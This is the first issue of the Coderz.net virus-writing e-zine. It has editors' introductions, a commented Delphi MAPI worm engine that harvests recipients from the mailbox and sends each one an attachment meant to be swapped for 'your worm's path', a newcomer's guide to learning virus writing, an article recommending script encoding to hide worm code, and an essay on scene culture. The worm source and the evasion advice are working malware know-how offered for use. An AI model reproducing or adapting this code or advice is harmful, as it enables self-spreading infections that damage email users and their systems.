Embed Size (px)
Citation preview
Gigabyte's IntroductionEvul's Introduction
Articles
MAPI Worms in C++ and Delphi HomeSliceViral Introduction GigabyteScript encoding ZuluSome politically incorrect words about the so-called "scene" SpanskaFaster Spreading SnakeByteAV-List SnakeByteAre Anti-Virus Companies Criminals? SnakeByteSome Tipz & trix for Win2k RatterA few ideas for viruses Kalkin/EViLThe protector scene Kalkin/EViLKatja Kladnik (Lucky Lady) Richard Karsmakers, contributed by Al LeitchAnti Avp Vbs I-Worms Detection [K]AlamarRetro the easy way MidNyteHow to become the world's richest man MidNyteAn Introduction to Encryption, Part III MidNyte
Source CodeASM
Win32.Infinite Billy Belcebu/IKXW9x.mATRiX Lifewire/IKXDildo T-2000/IRTequila Disassembled by T-2000/IRBad Seed Disassembled by T-2000/IRWin95.Yildiz Black JackCU.1076 Disassembled by Black JackWin.Tentacle_II Disassembled by Black JackWin32.DDoS SnakeByte
Win32.CrashOverwrite BeLiALOne Half Disassembled by Ratter
HLLWin32.HLLP.Scrambler.b GigabyteWin32.HLLP.STD Error/Team NecrosisWin32.HLLW.Hop_Along Quilb
VBA & VBSAM97.Lea Knowdeth/Metaphase & NoMercyVirusTeamWM97.NoBodyHears AngelsKitten/NuKENETWORK/OUTLOOK.FakeHoax ZuluWM97.Neclovek Lys Kovick/MetaphaseWM97.Unperson Lys Kovick/MetaphaseHTML.MSBound SuppaWM97.LSD WalruSWM97/2K.Aida e[ax]WM97/2K.String e[ax]WM97/2K.String2 e[ax]WM97/2K.Blade NecronomikonWM97/Lithium jackieXM97/Fireal jackie
BatchHighHopes.c Knowdeth/Metaphase & NoMercyVirusTeamFuck That 1.0a Deloss/NuKE
Binaries
Win32.Infinite Billy Belcebu/IKXIRoK v1.1c Raid/SLAMWin32.HLLP.Scrambler.b GigabyteI-Worm.Scooter GigabyteDildo T-2000/IRNETWORK/OUTLOOK.FakeHoax ZuluWin32.HLLP.Adrenaline AnonymousWin95.Yildiz Black JackShowdown GzR/NuKEProphecy GzR/NuKEWin32.CrashOverwrite BeLiALWin32.HLLP.STD Error/Team Necrosis
WordMacro.Blur.a Knowdeth/Metaphase & NoMercyVirusTeamand AngelsKitten/NuKE
InterviewsReal Time Interview with Rajaat
Interview with Raid/SLAM, about IrokInterview with The Unforgiven
Interview with Del Armg0/MATRiXVX meeting 2000 in Czech Republic: Opinions of a few VXers
Tools
E-Z Disassembler & Dumper 1.0 GzR/NuKEWord97 VBA SR1 Generator ver 1.1k Knowdeth/Metaphase & NoMercyVirusTeam
Humor
Kevin & Kell Bill Holbrook, contributed by SnakeManThe case of the stupid IRCop Raid
Gigabyte's Introduction
Hey there..
What is this e-zine? Well, it's mainly an oversight of what's been going on in and around the VX scene the last year.The zine is completely contribution based, as this zine is made by Coderz.net, which isn't a group. I've seen Coderz.netgrow from a fairly small website (being Evul's own homepage) to what it is now: A virus information site, hostingseveral (yeah, okay, shitloads) VX homepages. Maybe this is a moment to say, thanks Evul, for the time and effortyou put into Coderz.net.Thanks also goes to:
Rajaat, Raid and The Unforgiven: For taking the time to answer the interview questions, Rajaat even in real life(writing the answers down in his hard to read kinda handwriting :)GriYo, Benny, mort and Ratter: For answering the questions about the meeting.. and for the great time at the meetingitself of course :)Roadkil: For HTML help.. and for testing my sunglasses with green and yellow letters on IRC :PEXE-Gency and Del Armg0: For contributing another interview.Everyone else who has contributed viruses, articles, etc.: This zine wouldn't be possible without you.
Greets:
Evul: Keep your dirty socks away from #virus! :)Spyda: /me bites you :PQueen: Males.. nothing but trouble, right?Raid: How about we all smoke some weed and burn infected users with the hot ashes, hmm? :)Darkman: Walking sex encyclopediaBenny: Lying down on a used condom is not a good idea.. no, not even at a VX meeting! Unless you're called Benny..Jackie Twoflower: Lz0#2 is nice :)Rajaat: I still hate qwerty keyboardsT-2000: Fries and beer!Vecna: Still can't dance?Mandragore: Cheeseburgers :)Several other people in the scene.. I won't fill a whole zine with just this list :)
Fuck you:
Virus-X (aka Trevelyan or Frieza)Rhape79NalaThe Bughunter (aka CWarrior)Graham Cluley: You damn sexist
Evul's Introduction
Welcome to Coderz.Net zine issue 1.After long delay, and lots of procrastination, here it is - humble as it may be. This zine is made up of submissions frommany members of the VX scene, and edited in whole, by Gigabyte. We hope you enjoy this zine and coderz.net - andif all goes well, hopefully there will be an issue #2.Coderz.Net was never meant to be what it has become - it simply happened. It started out as a simple homepage, andthen a few sites were added, and from there it grew enormously. Over the last year it has been running on the average80 websites, and taking traffic at rates of over 1.5 million page hits per month at times. I have done my best to makesure that the site is functional for users, and that the site stays up to date, however this has become quite a job lately,due to the size and demand of site. Along with the normal troubles that come with such a site, Coderz has beenthrough major technical problems, threatened, harrassed, attacked, and run out of ISPs by the anger resulting fromisolated incidents - yet at over two years of age, its still here and doing fine.The idea of starting a zine was kicked around for a while by myself, and I decided not to, for lack of time and patienceto do so myself. A few months later, Gigabyte came to me about doing a zine for coderz, and after lots ofideas/debating she decided to take on the job and put together a zine herself .. great job, Gigs.Back to the workload talked about earlier, we desperately need people willing to dedicate some time to helping withCoderz, so both the site and the zine may continue to grow and improve. Anyone who is interested in helping, wewould be happy to hear from you. Email me at [email protected] if you would want to contribute. As part of the "liveand learn" process involved in getting this zine out to you, we decided that if there is to be a #2, we will definatelyneed people to help with it. Contact Gigabyte ([email protected]) about the zine.Once again, many thanks to gigabyte for the hard work on this zine, and we appologise for the extended wait for thisrelease.Well, enough of my ramblings, go read the damn zine already!Best Regards,John
program mapiworm ;uses
Windows , MAPI;{$R *.RES}
(************** MAPI Worms in C++ and Delphi ** *******************
I haven't seen much documentation on writing a wo rm via Win32 HLL's so here goes. Nothing revolutionary, just simple API calls. This article is mainly aimed at the beginner, sin ce actually researching this shit by hand is a major pain in the ass and time-consuming.
I'm showing the code in Delphi cause it's a bit e asier to read and looks nicer than C++. Code can easily be con verted to C in about thirty minutes, see Microsoft's MSDN sectio n for a complete MAPI C++ example for the syntax. A ton of code c an be snipped before inserting into your personal worm. I figure show ing it in "long form" to be nice etiquette for an article-specific prog ram.
This code was tested on NT 4.0, but might need a revision dependent upon your OS and how MAPI is setup. And before y ou laugh at 20k for just the worm engine, I checked AVP's site for MA PI and found some very large filesize worms doing moderately well i n the wild:
I-Worm.PrettyPark: http://www.avp.ch/avpve/NewExe /win32/ppark.stm I-Worm.ZippedFiles: http://www.avp.ch/avpve/worms /zipped.stm I-Worm.WinExt: http://www.avp.ch/avpve/worms/WINE XT.stm I-Worm.Plage: http://www.avp.ch/avpve/worms/Plage .stm
Couple of useful links:
Info on MAPI hook provider http://support.microsoft.com/support/kb/article s/Q224/3/62.ASP
MAPI Address example http://support.microsoft.com/support/kb/article s/Q126/6/58.asp
ReadMail example http://support.microsoft.com/support/kb/article s/Q140/3/37.asp*)
// Usage: HKEY_CURRENT_USER, 'Software\ImaFaggot', 'GayLesbian'function regReadString ( kRoot : HKEY; sKey , sValue : String ): String ;var
qValue : array [ 0. . 1023 ] of Char ;DataSize : Integer ;CurrentKey : HKEY;
beginRegOpenKeyEx( kRoot , PChar ( sKey ), 0, KEY_ALL_ACCESS, CurrentKey );Datasize := 1023 ;
// RegQueryValueEx(CurrentKey, PChar(sValue), nil, nil, nil, @DataSize);RegQueryValueEx ( CurrentKey , PChar ( sValue ), nil , nil , @qValue [ 0], @DataSize );RegCloseKey ( CurrentKey );Result := String ( qValue );
end ;
varMAPIMessage: TMAPIMessage;
lppMapiMessage : PMapiMessage ;Recip , inRecip : TMapiRecipDesc ;msgFile : TMapiFileDesc ;MError : Cardinal ;MapiSession , iMinusOne , i : LongInt ;
bWinNT, bFindFirst : Boolean ;ProfileName , sAddress , sProfile , sSentMail : String ;sSeedMessageID , sMessageID : array [ 0. . 512 ] of Char ;
os : TOSVersionInfo ;begin
// Which Operating System we on?os.dwOSVersionInfoSize := SizeOf ( TOSVersionInfo );GetVersionEx ( os );bWinNT := ( os.dwPlatformId = VER_PLATFORM_WIN32_NT);
// Grab default profilename from registryif ( bWinNT) thenProfileName := regReadString ( HKEY_CURRENT_USER,
'Software\Microsoft\Windows NT\CurrentVersion\Windo ws Messaging Subsystem\Profiles' ,'DefaultProfile' )
else// Standard WindowsProfileName := regReadString ( HKEY_CURRENT_USER,
'Software\Microsoft\Windows Messaging Subsystem\Pro files' , 'DefaultProfile' );
// Fucking Delphi bug won't allow a -1 to be set// within the structure, so we trick itiMinusOne := - 1;// Will hold any previous recipientssSentMail := '' ;
// Logon to MAPI. If no workie, get outta heretry
MError := MapiLogOn ( 0, PChar ( ProfileName ), nil , MAPI_NEW_SESSION, 0, @MapiSession );if ( MError <> SUCCESS_SUCCESS) then
Exit ;except
;end ;
// Fill in the file structure with our attachmentwith msgFile dobegin
ulReserved := 0;flFlags := 0;nPosition := iMinusOne ; // Let Outlook handle the file position// Obviously, replace the INI with your worm's path /filenamelpszPathName := PChar ( 'c:\windows\system.ini' );lpszFileName := nil ;lpFileType := nil ;
end ;
bFindFirst := True ;
// Walk through first fifty messagesfor i := 1 to 50 dotry
// Keep up with our MessageIDif ( bFindFirst ) thenbegin
sSeedMessageID := '' ;bFindFirst := False ;
endelse
sSeedMessageID := sMessageID ;
// Find a message// MapiFindNext serves as both a "findfirst/findnex t" function, dependent// upon if MessageSeed has a value
MError := MapiFindNext ( MapiSession , 0, nil , @sSeedMessageID , 0, 0, @sMessageID );if ( MError = SUCCESS_SUCCESS) thenbegin
// Obtain the long pointerlppMapiMessage := @MAPIMessage;// Open for Reading, headers only (both faster, and avoids// writing all the god damned attachments to temp d irectory)MError := MAPIReadMail ( MAPISession , 0, @sMessageID ,
MAPI_ENVELOPE_ONLY, 0, lppMapiMessage );if ( MError = SUCCESS_SUCCESS) and ( lppMapiMessage.lpRecips <> nil ) thenbegin
// Sets info about message recipientwith Recip dobegin
ulReserved := 0;ulRecipClass := MAPI_TO;sAddress := 'SMTP:' + lppMapiMessage.lpRecips.lpszAddress ;lpszAddress := Pchar ( sAddress );lpszName := lppMapiMessage.lpRecips.lpszName ;
ulEIDSize := 0;lpEntryID := nil ;
end ;
// Clear out to avoid any leftover settingFillChar ( MAPIMessage, SizeOf ( MAPIMessage), 0);// Fill the MapiMessage structure.// Unnecessary to expand entire struct, but aesthet ically pleasingwith MapiMessage dobegin
ulReserved := 0;lpszSubject := PChar ( 'Insert subject for message' );lpszNoteText := PChar ( 'Message text goes here' );lpszMessageType := nil ;lpszDateReceived := nil ;lpszConversationID := nil ;flFlags := 0;lpOriginator := nil ;nRecipCount := 1;lpRecips := @Recip ;nFileCount := 1;lpFiles := @msgFile ;
end ;
// Send the messageif ( Pos( lppMapiMessage.lpRecips.lpszAddress , sSentMail ) = 0) thenbegin
MError := MapiSendMail ( MapiSession , {handle} 0, MapiMessage , 0, 0);// Store this address, so no duplicate messages are sentsSentMail := sSentMail + lppMapiMessage.lpRecips.lpszAddress ;
end ;end ;
end ;except
; // Process your errors like a manend ;try
MError := MapiLogOff ( MapiSession , 0, 0, 0);except
;end ;
end.
Gigabyte
Explanation of some words.
Before I start, I will explain some words. You will probably not only see these words in Viral Introduction, you mightsee them in the rest of the zine as well.
VX: Virus eXchanging. VXers are those who are pro-virus, collect viruses, write them, exchange them..
AV: Anti Virus. They make virus scanners. Examples are: Anti Viral Toolkit Pro, Norton Antivirus, McAfee...
IRC: Internet Relay Chat. People use it to chat, to communicate. There are many different IRC servers, Undernet forexample.
IRC client: What people use to connect to an IRC server. Examples are: mIRC, PIRCH, Xircon, VIRC..
ASM: Assembly language. This language is most used to code viruses in.
TASM: Turbo Assembler. This is most used in the VX scene to assemble ASM source code into executable files.(Requires TLINK)
VBA: Visual Basic for Applications. It's a part of the Microsoft Office products.
VBS: Visual Basic Scripting language. Can be inside an HTML page. (for more information see the part about scriptviruses in "What is:", further down in this document.
Where to find information about viruses and collecting?
Well, I think I should give you some links to virus sites to begin with. Your first stop for finding any VX site shouldbe coderz.net. Check the "Hosted pages" part, you'll find many interesting sites on coderz.net, and they might containother links to VX sites elsewhere.
Coderz.net29A#virus HomepageVirus Trading CenterTally's Virus Link Reference
If you're looking for IRC channels about viruses, you could come to #vir and #virus on Undernet. Watch out: NEVERask or beg for viruses, you'll get kicked out. And DON'T TURN THE CAPS LOCK ON LIKE THIS, it's annoying,and it looks like you're yelling all the time, or you'll get kicked out. Viruses can be found on the net, if you put in a bit
of effort. If you can’t be bothered, or haven’t got the intelligence to find even a few, then you’re not likely to be helpedout. People in the scene will gladly help you out if you put in the effort first to prove you’re not just going to infectsomeone’s computer. They need to know you’re interested in learning.
In which language are viruses written?
Mainly in Assembler (ASM), but there are also macro-viruses, which are made in Visual Basic for Applications(VBA). VBA is a part of the Microsoft Office products. There are viruses that are written in other languages, butthey're a rarity. Newer is VBS, a scripting language that can be used for making worms or viruses.
How to learn how to write viruses?
If you wanna learn how to write viruses, you might want to read a tutorial. There are some tutorials in VDAT, forexample. VDAT contains a lot of information about viruses, VXers, VX groups and also tutorials about how to writeviruses. You can find answers on all kind of virus-related questions in VDAT, you can find some VX history, etc. Onewarning about VDAT though: it’s currently nearly 10Mb and can take a long time to download. It is definitely worth itthough. Also, yes it is an exe, yes it is made by someone interested in viruses, but NO, it is not a trojan as I have beenasked before. If you were going to write a trojan, would you make it 10Mb? I guess you’ll have to trust me on that :)
Download VDAT from:
Coderz.net's FTP
And also the Codebreakers magazines are good.
Get them from:
Codebreakers
or
Coderz.net's FTP
(Most of their tutorials can be found in VDAT)
Don't be discouraged when you start out coding, once you get the hang of the simple parts you can go at your ownpace with the rest.
For which words to search when looking for viruses or information about viruses?
Search for: virus, viruses, virii, VX, computervirus The best search engine to use is http://www.hotbot.com for anexact match. This can be useful when URL's of virus sites I gave you are down.
How to get into the VX scene?
You can meet VXers on IRC. Try #vir and #virus on Undernet. Read some tutorials (see "How to learn how to codeviruses?"). Have some patience. You have to get to know the people and they have to get to know you. And learninghow to code viruses might also take some time. If you have questions, first look if you can find the answer in VDATbefore asking. Start with the first tutorial, not with the last. Don't go to the next until you've finished.
Is it illegal?
That depends on the country you live in. Usually writing viruses isn't illegal, exchanging isn't illegal either, butspreading is. So if you send someone a virus without informing the person that it's a virus, that would be consideredspreading. Always check your country’s laws before doing anything virus-related. Governments don’t generallyunderstand you can be interested in a virus without needing to spread it, if you have a virus they assume you intend to
spread it.
Why do people write viruses?
There can be many reasons: challenge, fame, buck authority, they want to do something different..
What is:
an overwriter: A virus that completly overwrites files to infect them, so it doesn't save the original file. This is whatyou start with when you learn to code viruses. The host file is completely destroyed so the virus is noticed almostimmediately. Have a look at Codebreakers magazine #1, or SLAM magazine #2.
an appender: A virus that saves the parts of the infected file that are changed, then writes itself to the end of the hostprogram. At the end of the virus is some code to restore the program (in memory only) and run it. Because the hostprogram still works, your virus has a better chance of going un-noticed than an overwriter. This is explained inCodebreakers magazine #2 or SLAM magazine #3.
a prepender: - A prepending virus will write itself to the start of a program instead of the end. This has the advantageof not requiring a calculation called the ‘delta offset’. Don’t worry about this yet, the tutorials will explain it when youget there, I just mention it so you know that there is a difference between a prepender and an appender.
encryption: - Encryption is a way to hide the true function of your virus code, and any messages contained in it. Anencrypted virus has a decyptor at the start that decrypts the rest of it then passes control to the now unencrypted part.
polymorphism: A virus that creates a completely different decryptor every time, to avoid the AV being able to make ascan-string for the virus.
TSR: - A virus that stays resident in memory. This can be particularly effective, because any program even listed in a‘DIR’ command can be infected by a TSR virus.
bootsector: - A bootsector is the part of the disk that is read automatically when the computer starts and loads theoperating system. A virus that infects here can load before the operating system, and therefor before any AV programcan be installed in memory.
a macro-virus: Infects MS Office documents, is written in VBA. An example is the Melissa virus.
a script virus: A virus made in Java script or VBS. Those languages can be used inside an HTML page, so the viruscan be inside the HTML page. That's why they're sometimes called HTML viruses. VBS is also called 'Winscript'.Scripting languages are also good to make worms in. An example is Bubbleboy.
How to get recognized?
Have patience.. I hope, after you have read Viral Introduction, you've found the information you were looking for,know where to look for tutorials and virus sites and that you know what the VX scene is.
Good luck,
Gigabyte
Thanks a lot to MidNyte, for all the help with the article and suggestions, and to Spyda for the 'Viral Introduction'picture.
Script encoding
09/09/2000
Hi all.
First, when reading this, consider that English is not my native language, so expect some mistakes in the text. :)
I was going to submit my last worm for the zine, but well, instead of that I decided to write some things aboutencoded scripts (JScript/VBScript) and only use that worm as an example. With this I mean Microsoft's encoding,not other manual ways of encoding or making your code harder to read.So this is my first article for a zine, most of my viruses/worms where included in many, but just that, not real articlesor tutorials.
Script encoding in HTML files
Script encoding started with Internet Explorer 5, in that time it was possible to use the "<script>" tag of HTML filesto write scripts in JavaScript, JScript or VBScript, but this version added new values for the "language" property ofthat tag, those values were "JScript.Encode" and "VBScript.Encode".Examples:
<script language="JScript.Encode">
<script language="VBScript.Encode">
I said that Internet Explorer 5 started this because it included version 5 of both JScript and VBScript, which are theones that included this new feature.
For encoding your script you need Script Encoder which is available from http://msdn.microsoft.com/scripting. ThisWin32 command line program will read your HTML file with a script tag having "VBScript" as it's "language" valueand it will write a new HTML file with your code encoded and with the "language" attribute changed to"VBScript.Encode". Similar thing happens when using JScript.For example, something like this:
<script language="VBScript"> MsgBox "Example"</script>
Will be changed to:
<scriptlanguage="VBScript.Encode">#@~^GgAAAA==@#@&P~t/TAWXPr36m:2VJ@#@&7gUAAA==^#~@</script>
Have in mind that this encoding is really designed for casual readers of your code, the truth is that it's trivial and willnot protect your code from people that is decided to view it.
Of course that this things are only supported in Internet Explorer, not in other browsers. Script languages are notpart of the HTML language, not even the "language" attribute is part of HTML 4, the correct attribute would be"type", but well, that is another matter that is not virus related.
At the time of writing this I know only one virus using this feature in HTML files, it is HTML.Lanus which I wrote time
ago. Anyway, I explained script encoding in HTML files to show how it was possible, but as we know, HTML filesare not a real target for viruses since scripting in them needs authorization from the user when using most neededobjects unless we are using some kind of bug to skip the warning message.
Script encoding in Windows Script Host
Windows Scripting Host 1 (also known as WSH in this text) was included for the first time in Windows 98. Itsupported JS (JScript) and VBS (VBScript) files to do scripting, and with this, a new type of viruses was started byLord Natas. No encoding was possible.
Time later Windows Scripting Host changed it's name to Windows Script Host and version 2 was out. One of thethings that this new version added was the possibility of encoding our scripts like it was possible with HTML files byusing two new extensions, JSE and VBE.JSE are JS files after using the encoder, the same happens with VBE and VBS.
For using the encoder with JS and VBS files is the same as with HTML files, it reads a VBS file with our script and itcreates a VBE file which has our encoded script.
NETWORK/OUTLOOK.FakeHoax
NETWORK/OUTLOOK.FakeHoax is an example of script encoding in Windows Script Host. It is the first virus/wormusing the JSE and VBE extension (at least not as auxiliary files), so it has two versions, one in JScript and other inVBScript.
It uses OUTLOOK and the network shares for spreading. The main code is a COM object written in XML andVBScript using Windows Script Component, so the code in the JSE and VBE file is trivial. Both versions create aWSC file (the COM object defined in XML) and then both call methods and change properties of that object, no realspreading code is in those files.
The worm was written in this way to make it easier to port it to any other language, this way I was able of creating aJSE and a VBE file without really porting the main code. Also, it's possible to create new versions using Delphi,Visual C++, or any other by using "REGSVR32.EXE" to register the WSC file as a COM object before calling it'smethods or changing it's properties.
This worm was written to show how JSE and VBE files could be used in viruses/worms, since before this theywhere only used as auxiliary files (some versions of HTML.rahC by 1nternal and OUTLOOK.Monopoly by me forexample). Besides, since it needs Windows Script Host 2 or later, it won't be good spreading itself at the time ofwriting this.
Also, this was a good opportunity for using Windows Script Component for the first time because it made possibleto write a JScript and a VBScript version without needing to port the whole code, so this is also the first virus/wormusing it's own COM object.
NETWORK/OUTLOOK.FakeHoax text file including source code: network_outlook.fakehoax.txt.NETWORK/OUTLOOK.FakeHoax ZIP file (text file and working copies of the worm): network_outlook.fakehoax.zip.
Script encoding support
When writing viruses you must know in which systems your code will work. Even that script encoding is not new, itwas not a valid feature for viruses since not many systems supported it. But this is changing in this days andencoding is now possible for a worm with good spreading capabilities.
Script encoding in HTML files: supported in any system with JScript/VBScript 5+ (included in Internet Explorer 5+).
JSE and VBE files: supported in any system with Windows Script Host 2+ (included in Windows 98 SE, Windows2000 and Windows Me).
Also, JScript/VBScript 5+ and Windows Script Host 2+ can be installed as separate packages. For example, anencoded script in a HTML file could be run in Internet Explorer 4 if JScript/VBScript 5+ separate package isinstalled.
Trick to run JSE and VBE files in systems with WSH version 1
By using a trick I found, JSE and VBE files can be run in systems with WSH version 1 instead of version 2 ifJScript/VBScript 5+ is installed.
Let's see an example, a system has Windows 98 (not Windows 98 SE) and Internet Explorer 5 installed. WSH 2+separate package was not installed.So this system has WSH 1 and JScript/VBScript 5, since WSH 1 was included with that Windows version (unless itwas not selected in a custom installation) and JScript/VBScript 5 was included with Internet Explorer 5.This system is able to understand encoded scripts, it just doesn't has the JSE and VBE extension support. So torun a JSE or VBE file we can create a WSH file that calls the encoded script.
This means that instead of running a VBE file directly (not possible in the example), we can run a WSH file (whichis supported in WSH 1) that runs a VBE file.
This method was used in OUTLOOK.Monopoly, the worm was a VBS file that created a WSH and a VBE file andthen runs the WSH file, so the main code was encoded and it worked in the first edition of Windows 98 with InternetExplorer 5 installed. WSH 2+ was not needed in this worm.
I won't explain how WSH files work, to know more about them, create a JS file and then view it's properties,changing some of them will create a WSH file in that same directory. Then view it and play with those values. :)
Other file types in which script encoding may be used
Script encoding can be used in any file format that accepts the "<script>" tag. Anyway some file formats like WSCand WSF are not supported by the actual version of Script Encoder, but you can include encoding in those filetypes by creating the "<script>" tag in a HTML file and then copying the encoded code to the WSC or WSF file.Script Encoder recognized extensions are ASA, ASP, CDX, HTM, HTML, JS, SCT and VBS.
Script encoding and viruses
You can use this feature in HTML viruses/worms even that they are not something very interesting, or you may useit in worms in JSE or VBE format, which will be better methods.
Normal viruses in JSE and VBE format are not interesting since it would be like JS and VBS viruses, there are notmany files to infect since they are not used much by people, well, maybe you can find lot's of them in my computersince I'm so crazy about scripting and I use it for lot's of simple tasks, but most users don't use WSH. :)Also, encoding won't make a file simple to infect, since it would be necessary to decode it, infect it and then encodeit again.
This days there are a lot of worms in VBS files (not happening the same with JScript ones), well, all this wormscould be easily encoded.
Encoding VBS files will have two advantages:
1) The code will be encoded, so it will be harder to read and most users won't do that.2) VBS files are a known target for worms, but VBE files are not. So VBE extension is far better for them.
But there are also two disadvantages:
1) Some old systems may not be able of running VBE files.2) The script will be a few bytes bigger. But they are only a few so this is not really a big disadvantage.
Well, that's all, let me know in case of any error you find about technical things or for any question you have.Bye all.
[email protected]://coderz.net/zulu
Some politically incorrect words about the so-called "scene"
[by Spanska, written for Coderz.net e-zine]
- Ethnographic introduction
Virus writers and all people classified globally under the "Vx" label are an interestingpopulation to observe. Especially if you can have a look from the inside, and, at thesame time, if you're not involved enough, in order to be able to see the "scene" from anindependant and exterior point of view. I think i qualify here. I'm around since a fewyears, met some coders in real life, wrote some viruses, but at the same time i was nevermember of any group, i'm old enough to be able, i hope, to think with some distance,and these last monthes i basically had better things to do than to write code.
- Don't ask "How much time you spend on IRC?", but ask "Show me your code!"
The main problem of the "scene" can be spelled in three letters: IRC. I'm impressed tosee how people spend so much time chatting about everything except virus codingtechniques. They think that to be a real virus writer, you need to be accepted in somevirus channel, and then spend twelve hours a day there. High dosis of IRC induces asort of twist in reality perception, because people behave there very differently from reallife. How many people we saw, and we will see, very proud of their brand new op,kicking, banning, laughing about infected users, acting as some powerful agressive elite.Even if they never produced one single line of code. Even if they never did anythinguseful for the Vx community. Even if their only production is a twenty line macro-virus.Even if they have to go to school the day after, where they will not be "DarkLordz" or"KillerGod" anymore, but normal average teens who have to do their homework. If youthink you're a mature person, and i guess most of us are, behave as a mature personeven on IRC.
You may think i exagerate when i talk about this twist of reality. Unfortunately, i cancite lots of examples. Let's take one that everybody heard about. This coder, no need totell his nickname, according to his own words, sent logs to some anti-virus peopleshowing that another coder was actively spreading viruses, to "protect one or twochannels from being deleted by Undernet". Basically, that means that the existence ofIRC channels is more important that a real person's life. Because, unfortunately,nowadays, spreading viruses can lead directly to some years in jail, depending on thelaws in your country. Which means a destroyed life. Just to "save a channel". You see
the twist. I'm pretty sure now the guy in question recognizes the big error he made, andi hope he learnt from that, but anyway, it's too late.
This example was of course a bit unique in his importance. But it's typical of a state ofmind very widespread in the Vx community. People think an op is the most importantthing in life. They thing their rank level in the channel's bot is the only important thing,proportional to their eliteness. Twist again. Importantly, this changes thecommunication and the behaviour between people. Who is going to criticize the ownersof their favourite channels? Or more generally, people with a higher level? This leads tohypocrisy, which is very widespread in the community.
I saw too much examples of guys and girls spending so much time on IRC thateverything that happened there, even the most anecdotical fights, was taking a hugeimportance. Let me tell you: if you need a computer and to be connected to feel humanemotions like pain, angryness, friendship or love, there is something wrong. Really.
IRC has another problem. It's dangerous. It seems that Vx people never learnt thelessons from the Melissa case. They don't care about encryption, they don't care aboutremailers, they don't care what they say on-line can be used to profile or tracethemselves or, even more importantly, some of their friends. They keep megabytes ofsensitive IRC logs and old mails. They just don't care until the worst happens. Viruswriting and spreading is no more a funny game. It's a dangerous criminal activity, andyou have to take this fact in account, especially if you spread your viruses, or havefriends who do that. This is the main revolution in Vx Land these recent years. Nowthey are seriously after us. And nobody cares.
- Vxers as crickets
Let's talk about another interesting behaviour in the Vx scene: the flocking in groups.That's funny how people who repeat so often that they are independant, or thinkdifferent, do all their possible to integrate or create some clan with similar people, andthen be proudly tagged as a member of a larger entity known as a Vx group, with itsown set of new rules and laws they have to conform to. Like sheeps. The analogy is nothere just as a cheap provocation. It's a very old animal behaviour. Individuals are weak;if they flock, they are stronger against all possible ennemies. Or at least they feelstronger. Crickets are a good example. Whenever they form a very large group, theirbehaviour changes completely and they become much more agressive. They are no moreafraid of predators. It's very funny to see the same kind of basical animal regression inVx crowds.
Or maybe it's just to get some form of reconnaissance. People with no skill, or peopleafraid to learn (because we were all lamers at day zero, we should not forget that) knowthat they will never be accepted in the community for their own merits. So they need asort of official tag to prove to others and maybe even more to themselves that they arepart of Vx scene. This mark is provided by the membership in some group, whichprovide easily and quickly an official entrance ticket into the scene. No need to produceanything useful, now. You are already inside the community, even by a totally artificialway.
Here again, examples are numerous. Was it one year ago that a new mainly english-based group appeared, totally over-hyped, with every newcomer wanting to integrate?They did nothing, most of their members were just plain unknown, but you couldn'tmiss their presence on IRC. Everybody laughed at them, but nobody told them directlythat they were totally ridiculous, for example with their "public relation department"
(more on that later), and other really laughable things. Yet, again, IRC was the main"scene" participation. Where is the code? I think now this group returned to the dust itappeared from, but who really cares? I remember too these ridiculous but finallyrewarded ass-licking efforts by a coder (who is a cool and very intelligent guy, butanyway) to integrate a high-profile group. Once he was at last able to glue this well-known tag to his nickname, he reached his goal, and just disappeared. He never codedanything else.
People sometimes tell me: "being member of a group is a good way to motivate". If youneed to be motivated or gently forced to be a vxer, it should be a better idea to spendyour time fishing, or doing something you don't need to be motivated for. Forget for amoment the question "how to be a vxer" (and basically, if you still don't know theanswer, it's time to return to your stamp collection), but ask yourself the more importantquestion: why do you want to be a Vxer? For the hype? Because it's cool? Becausepeople will fear you? Because you want to satisfy your ego? Because your want toimpress your girlfriend or your mom? Because you're looking for on-line friends? Orjust because you are curious, you want to code and learn some new knowledge?
- I'm soooo afraid to talk with normal people!
Another strong critic and clear sign of immaturity that comes to mind. Most of the Vxerare not able to argument with people from the two other sides of the virus triangle: anti-virus people and infected users. There is a good place for that: alt.comp.virus on Usenet.A mainly anti-virus group nowadays, unfortunately, with some non-interesting parrots,but anyway, the only place where you can directly and publically discuss with membersof the anti-virus industry. They have their share of big hypocrisy, ego, closed mind, ofcourse, but i'm not talking about them right now. These guys, and some of them arevery smart, have a lot of tough arguments to oppose to us. The easy way, used by mostof Vx people, is not to participate in this group, and avoid any kind of discussion. Orjust to pop up here once, insult everybody, and jump back to their hole. What does itmean? Easy: virus writers are not enough open-minded to quietly discuss with peopleopposing them, listen and contradict some opposite argumentation. Or maybe they arenot smart and mature enough to engage in an adult discussion. It is kind of funnybecause Vx often ask for people to be open-minded about virus writing activities.Instead of bashing the largely beloved Nick Fitzgerald on IRC, where he is not, whatabout trying to argue against him publically in the newsgroup? Of course, it may be abit tougher, due to his rhetorical skills.
Some vx people told me that they don't participate in this forum because it's a mainlyAV group. Think a bit more about this argumentation. It's kind of recursive, a bit likean infinite loop, to use coding terms. It looks like an auto-realizing prophecy. In otherwords, it's plain stupid.
- Ego scene
I could talk more about the grossly over-inflated ego of most of us (me included), butmy hour of reflexion is over. Anyway, just as an example, i always find funny thedramatic and emphatic farewells from people leaving the "scene", although theygenerally never produced anything noticeable, texts apparently always written withsome emotion. If you want to leave, just disappear silently and return to where youcame from, nobody will notice anyway, keep contacts if you want, and don't botherpeople with your ridiculous tears in the eyes and other "official" retirement. The dayyou decided to become a vxer, you didn't issue a public statement "People, listen to me,today i officially join the vx scene!". So, do the same when you leave. Every other way
to stop is just a desesperate and childish call for attention, from people who didn'treceive enough of it for their production during their career, an ultimate try to turnpeople eyes in their direction for one or two minutes. This impression is even worsenedwhen the guy gives, as a reason, "there is too much shit in the scene these days", orsomething like that. That clearly means that they were not here to code and to learn.They probably needed to be accepted in whatever community to find some other peopleto talk with. What about the Barbie doll collector scene? Now i think about it, theutimate case of lameness is the guy who declares everywhere that he quits, and isactually still around. Not even able to follow his own words.
